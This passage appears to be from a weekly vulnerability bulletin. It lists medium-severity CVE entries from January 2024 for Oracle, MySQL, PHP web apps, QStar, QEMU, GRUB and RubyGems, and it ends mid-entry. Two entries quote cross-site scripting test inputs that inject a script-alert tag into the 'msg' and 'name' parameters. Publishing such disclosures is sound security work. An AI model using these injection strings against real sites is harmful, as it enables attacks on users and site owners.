oracle -- bi_publisher | Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0, 7.0.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 5.4 | CVE-2024-20979 | secalert_us@oracle.com
oracle -- bi_publisher | Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 5.4 | CVE-2024-20987 | secalert_us@oracle.com
oracle -- business_intelligence | Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Pod Admin). Supported versions that are affected are 6.4.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. While the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N). | 2024-01-16 | 5 | CVE-2024-20904 | secalert_us@oracle.com
oracle -- complex_maintenance\,_repair\,_and_overhaul | Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: LOV). Supported versions that are affected are 11.5, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized read access to a subset of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20942 | secalert_us@oracle.com
oracle -- customer_interaction_history | Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Customer Interaction History. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Customer Interaction History, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Customer Interaction History accessible data as well as unauthorized read access to a subset of Oracle Customer Interaction History accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20950 | secalert_us@oracle.com
oracle -- installed_base | Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20934 | secalert_us@oracle.com
oracle -- integrated_lights_out_manager_firmware | Vulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 4.8 | CVE-2024-20906 | secalert_us@oracle.com
oracle -- istore | Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: ECC). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20938 | secalert_us@oracle.com
oracle -- isupport | Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iSupport. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iSupport, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iSupport accessible data as well as unauthorized read access to a subset of Oracle iSupport accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 5.4 | CVE-2024-20944 | secalert_us@oracle.com
oracle -- knowledge_management | Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Create, Update, Authoring Flow). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20940 | secalert_us@oracle.com
oracle -- knowledge_management | Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Setup, Admin). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2024-01-16 | 6.1 | CVE-2024-20948 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20961 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20963 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20973 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20975 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20977 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 6.5 | CVE-2024-20985 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). | 2024-01-16 | 5.5 | CVE-2024-20967 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). | 2024-01-16 | 5.5 | CVE-2024-20969 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 4.9 | CVE-2024-20965 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 4.9 | CVE-2024-20971 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 4.9 | CVE-2024-20981 | secalert_us@oracle.com
oracle -- mysql | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2024-01-16 | 4.9 | CVE-2024-20983 | secalert_us@oracle.com
oracle -- one-to-one_fulfillmentVulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Documents). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data as well as unauthorized read access to a subset of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20936
secalert_us@oracle.com
oracle -- outside_in_technologyVulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Content Access SDK, Image Export SDK, PDF Export SDK, HTML Export SDK). The supported version that is affected is 8.5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).2024-01-166.3CVE-2024-20930
secalert_us@oracle.com
oracle -- solarisVulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).2024-01-165.5CVE-2024-20946
secalert_us@oracle.com
oracle -- webcenter_contentVulnerability in the Oracle WebCenter Content product of Oracle Fusion Middleware (component: Content Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20928
secalert_us@oracle.com
oracle -- webcenter_sitesVulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).2024-01-166.1CVE-2024-20908
secalert_us@oracle.com
oracle -- zfs_storage_appliance_kitVulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).2024-01-164.4CVE-2024-20959
secalert_us@oracle.com
oracle-- multiple_productsVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).2024-01-165.9CVE-2024-20926
secalert_us@oracle.com
oretnom23 -- house_rental_management_system
A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607.
2024-01-13 | 4.8 | CVE-2024-0499 | cna@vuldb.com

oretnom23 -- house_rental_management_system
A vulnerability, which was classified as problematic, was found in SourceCodester House Rental Management System 1.0. Affected is an unknown function of the component Manage Tenant Details. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250608.
2024-01-13 | 4.8 | CVE-2024-0500 | cna@vuldb.com

oretnom23 -- house_rental_management_system
A vulnerability has been found in SourceCodester House Rental Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Manage Invoice Details. The manipulation of the argument Invoice leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250609 was assigned to this vulnerability.
2024-01-13 | 4.8 | CVE-2024-0501 | cna@vuldb.com

paxtechnology -- paydroid
PAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.45_20230314 or earlier can allow overwriting the signed partition and, subsequently, local code execution via a hidden command. The attacker must have physical USB access to the device in order to exploit this vulnerability.
2024-01-15 | 6.8 | CVE-2023-42134 | cvd@cert.pl

paxtechnology -- paydroid
PAX A920Pro/A50 devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow local code execution via parameter injection by bypassing the input validation when flashing a specific partition. The attacker must have physical USB access to the device in order to exploit this vulnerability.
2024-01-15 | 6.8 | CVE-2023-42135 | cvd@cert.pl

pcman -- ftp_server
A vulnerability was found in PCMan FTP Server 2.0.7. It has been classified as problematic. This affects an unknown part of the component USER Command Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250719.
2024-01-16 | 5.3 | CVE-2021-4432 | cna@vuldb.com

pcman -- ftp_server
A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.
2024-01-19 | 5.3 | CVE-2024-0731 | cna@vuldb.com

pcman -- ftp_server
A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.
2024-01-19 | 5.3 | CVE-2024-0732 | cna@vuldb.com
phpgurukul -- art_gallery_management_system
In PHPGurukul Art Gallery Management System v1.1, the "imageid" parameter of the "Update Artist Image" functionality is vulnerable to SQL Injection.
2024-01-12 | 6.5 | CVE-2023-51978 | cve@mitre.org

phpgurukul -- blood_bank_&_donor_management_system
A vulnerability, which was classified as problematic, was found in Blood Bank & Donor Management 1.0. This affects an unknown part of the file request-received-bydonar.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250581 was assigned to this vulnerability.
2024-01-13 | 4.8 | CVE-2024-0476 | cna@vuldb.com

phpgurukul -- company_visitor_management_system
A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability.
2024-01-18 | 4.8 | CVE-2024-0652 | cna@vuldb.com

piwigo -- piwigo
Cross Site Scripting vulnerability in piwigo v.14.0.0 allows a remote attacker to obtain sensitive information via the lang parameter in the Admin Tools plug-in component.
2024-01-12 | 6.1 | CVE-2023-51790 | cve@mitre.org

plone_cms -- plone_cms
A Cross-Frame Scripting vulnerability has been found in Plone CMS affecting versions below 6.0.5. An attacker could store a malicious URL to be opened by an administrator and execute a malicious iframe element.
2024-01-18 | 6.3 | CVE-2024-0669 | cve-coordination@incibe.es

profilepress_membership_team -- paid_membership_plugin,_ecommerce,_user_registration_form,_login_form,_user_profile_&_restrict_content_profilepress
Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress. This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress: from n/a through 4.3.2.
2024-01-19 | 6.6 | CVE-2022-45083 | audit@patchstack.com

project_worlds -- student_project_allocation_system
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.
2024-01-19 | 4.3 | CVE-2024-0726 | cna@vuldb.com

project_worlds -- visitor_management_system
A vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input "><script>alert('torada')</script> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376.
2024-01-18 | 4.3 | CVE-2024-0650 | cna@vuldb.com

project_worlds_online -- time_table_generator
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.
2024-01-19 | 6.3 | CVE-2024-0730 | cna@vuldb.com

prosshd -- prosshd
A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.
2024-01-19 | 5.3 | CVE-2024-0725 | cna@vuldb.com
qemu -- qemu_built-in_VNC_server
A flaw was found in the QEMU built-in VNC server while processing ClientCutText messages. The qemu_clipboard_request() function can be reached before vnc_server_cut_text_caps() was called and had the chance to initialize the clipboard peer, leading to a NULL pointer dereference. This could allow a malicious authenticated VNC client to crash QEMU and trigger a denial of service.
2024-01-12 | 6.5 | CVE-2023-6683 | secalert@redhat.com

qstar -- archive_storage_manager
QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based reflected XSS vulnerability within the component qnme-ajax?method=tree_table.
2024-01-13 | 6.1 | CVE-2023-51064 | cve@mitre.org

qstar -- archive_storage_manager
An unauthenticated reflected cross-site scripting (XSS) vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 allows attackers to execute arbitrary JavaScript in a victim's browser via a crafted link.
2024-01-13 | 6.1 | CVE-2023-51067 | cve@mitre.org

qstar -- archive_storage_manager
An access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily disable the SMB service on a victim's QStar instance by executing a specific command in a link.
2024-01-13 | 6.5 | CVE-2023-51071 | cve@mitre.org

qstar -- archive_storage_manager
An unauthenticated log file read in the component log-smblog-save of QStar Archive Solutions RELEASE_3-0 Build 7 Patch 0 allows attackers to disclose the SMB Log contents via executing a crafted command.
2024-01-13 | 5.3 | CVE-2023-51062 | cve@mitre.org

qstar -- archive_storage_manager
An authenticated reflected cross-site scripting (XSS) vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 allows attackers to execute arbitrary JavaScript in a victim's browser via a crafted link.
2024-01-13 | 5.4 | CVE-2023-51068 | cve@mitre.org

red_hat -- red_hat_enterprise_linux_8
An authentication bypass flaw was found in GRUB due to the way that GRUB uses the UUID of a device to search for the configuration file that contains the password hash for the GRUB password protection feature. An attacker capable of attaching an external drive such as a USB stick containing a file system with a duplicate UUID (the same as in the "/boot/" file system) can bypass the GRUB password protection feature on UEFI systems, which enumerate removable drives before non-removable ones. This issue was introduced in a downstream patch in Red Hat's version of grub2 and does not affect the upstream package.
2024-01-15 | 5.6 | CVE-2023-4001 | secalert@redhat.com

rubygems.org -- rubygems
Rubygems.org is the Ruby community's gem hosting service. Rubygems.org users with MFA enabled would normally be protected from account takeover in the case of email account takeover. However, a workaround on the forgotten password form allows an attacker to bypass the MFA requirement and take over the account. This vulnerability has been patched in commit 0b3272a.
2024-01-12 | 4.8 | CVE-2024-21654 | security-advisories@github.com

sandsprite scdbg.exe -- sandsprite scdbg.exe
